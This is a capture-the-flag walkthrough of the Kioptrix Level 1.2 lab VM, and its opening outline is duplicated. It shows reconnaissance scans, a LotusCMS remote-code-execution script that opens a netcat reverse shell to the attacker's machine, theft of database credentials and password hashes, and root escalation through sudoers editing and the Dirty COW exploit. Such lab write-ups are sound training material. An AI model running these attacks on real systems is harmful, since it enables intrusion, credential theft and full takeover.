VM : Kioptrix: Level 1.2 (#3)
Download Link : https://download.vulnhub.com/kioptrix/KVM3.rar
VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP
Nmap Scan :
* The apache web server is running on port 80.
* SSH is running on port 22.
Checking the web app
Link : urlCroll.py
http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com/index.php?system=Blog
Also note that the web app is using LotasCMS.
There is also a gallery app, but to access all its content map the IP address of VM to kioptrix3.con by adding it to /etc/hosts file
Scanning Web Application :
nikto scan output
Similarly results from dirb
Exploiting Lotas CMS :
A quick search of lotasCMS vulnerability will shows that version 3.0 is vulnerable to RCE
Link : https://github.com/Hood3dRob1n/LotusCMS-Exploit
To exploit this start a listener on attack machine
Enumerating files :
Looking at web directory :
Privilege Escalation :
Method 1 :
There is a file CompanyPolicy.README, which descirbe command 'sudo ht'
Open th file By
To change it into text mode press `F6` and coose text mode
We have to change '!/usr/bin/su' to '/bin/su'
To edit file change the mode into "hex" (press F6) and press F4 to edit, now just place "20" (hex for space) into the place of "!/usr" in "!/usr/bin/su", which looks like
Before :
After :
and press F2 to save.
Now just run the command `sudo su`
Method 2 :
We are using this method within the reverse shell obtained by LotusCMS exploit.
First check the version of OS and Kernel
Download Link : https://download.vulnhub.com/kioptrix/KVM3.rar
VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP
Nmap Scan :
$ nmap -A 192.168.1.5 -oN nmap.scan
# Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
Nmap scan report for 192.168.1.5
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.8 - 2.6.30
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 0.04 ms 172.17.0.1
2 0.41 ms 192.168.1.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds
* The apache web server is running on port 80.
* SSH is running on port 22.
Checking the web app
$ python urlCroll.py http://kioptrix3.com/
http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Blog
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com//gallery
Link : urlCroll.py
http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com/index.php?system=Blog
Also note that the web app is using LotasCMS.
There is also a gallery app, but to access all its content map the IP address of VM to kioptrix3.con by adding it to /etc/hosts file
$ sudo echo '192.168.1.5 kioptrix3.com' >> /etc/hosts
http://kioptrix3.com/gallery
Scanning Web Application :
nikto scan output
$ nikto -host kioptrix3.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.5
+ Target Hostname: kioptrix3.com
+ Target Port: 80
+ Start Time: 2020-04-20 18:46:19 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-04-20 18:46:28 (GMT5.5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Similarly results from dirb
$ dirb http://kioptrix3.com | tee dirb.scan
==> DIRECTORY: http://192.168.1.5/cache/
+ http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126) + http://192.168.1.5/index.php (CODE:200|SIZE:1819) + http://192.168.1.5/cache/index.html (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.1.5/core/controller/
+ http://192.168.1.5/core/index.php (CODE:200|SIZE:0) + http://192.168.1.5/gallery/index.php (CODE:500|SIZE:5650) + http://192.168.1.5/phpmyadmin/favicon.ico (CODE:200|SIZE:18902) + http://192.168.1.5/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0) + http://192.168.1.5/style/admin.php (CODE:200|SIZE:356) + http://192.168.1.5/style/index.php (CODE:200|SIZE:0) + http://192.168.1.5/core/controller/index.php (CODE:200|SIZE:0) + http://192.168.1.5/core/lib/index.php (CODE:200|SIZE:0) + http://192.168.1.5/core/model/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/core/view/index.php (CODE:200|SIZE:0) + http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126)
+ http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
+ http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
+ http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
+ http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)
$ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
$ cat dirsearchReport | grep 200
200 2KB http://kioptrix3.com/cache/
200 688B http://kioptrix3.com/core/fragments/moduleInfo.phtml
200 23KB http://kioptrix3.com/favicon.ico
200 2KB http://kioptrix3.com/index.php
200 2KB http://kioptrix3.com/index.php/login/
200 146B http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
200 8KB http://kioptrix3.com/phpmyadmin/
Exploiting Lotas CMS :
A quick search of lotasCMS vulnerability will shows that version 3.0 is vulnerable to RCE
Link : https://github.com/Hood3dRob1n/LotusCMS-Exploit
To exploit this start a listener on attack machine
$ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
$ chmod +x lotusRCE.sh
$ ./lotusRCE.sh kioptrix3.com /
Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
About to try and inject reverse shell....
what IP to use?
192.168.1.3 <----- IP address of local machine
What PORT?
1234 <---- listener port number
OK, open your local listener and choose the method for back connect:
1) NetCat -exploit 3) NetCat Backpipe5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1
Listening on [0.0.0.0] (family 0, port 1234)
Connection from kioptrix3.com 37530 received!
whoami
www-data
python -c 'import pty;pty.spawn("/bin/sh")'
$
Enumerating files :
Looking at web directory :
$ pwd
pwd
/home/www/kioptrix3.com
$ ls
cache data gallery index.php style
core favicon.ico gnu-lgpl.txt modules update.php
$ cd gallery
$ ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
$ cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
dreg fb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
dreg : Mast3r
loneferret : starwars
$ ssh loneferret@192.168.1.5
loneferret@192.168.1.5's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ cd /root
-bash: cd: /root: Permission denied
Privilege Escalation :
Method 1 :
There is a file CompanyPolicy.README, which descirbe command 'sudo ht'
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$ sudo ht
sudo: no passwd entry for root!
loneferret@Kioptrix3:~$ which ht
/usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht
Open th file By
$ sudo ht /etc/sudoers
To change it into text mode press `F6` and coose text mode
We have to change '!/usr/bin/su' to '/bin/su'
To edit file change the mode into "hex" (press F6) and press F4 to edit, now just place "20" (hex for space) into the place of "!/usr" in "!/usr/bin/su", which looks like
Before :
After :
and press F2 to save.
Now just run the command `sudo su`
loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# whoami
root
Congrats.txt ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:~#
Method 2 :
We are using this method within the reverse shell obtained by LotusCMS exploit.
First check the version of OS and Kernel
$ cat /etc/issue
Ubuntu 8.04.3 LTS \n \l
$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
So the kernel version is 2.6.24, now for searching exploit for Linux kernel 2.6.24 i found following exploit : https://www.exploit-db.com/exploits/40839
According to the documentation the exploit creates a new user 'firefart' with root privilege, download it and test it.
According to the documentation the exploit creates a new user 'firefart' with root privilege, download it and test it.
$ cd /tmp
$ wget wget 192.168.1.3:8000/exploit.c
$ gcc -pthread exploit.c -o exploit -lcrypt
exploit.c:193:2: warning: no newline at end of file
$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
$ su firefart
Password: 12345
firefart@Kioptrix3:/tmp# cd /root
firefart@Kioptrix3:~# ls
Congrats.txt ht-2.0.18
firefart@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)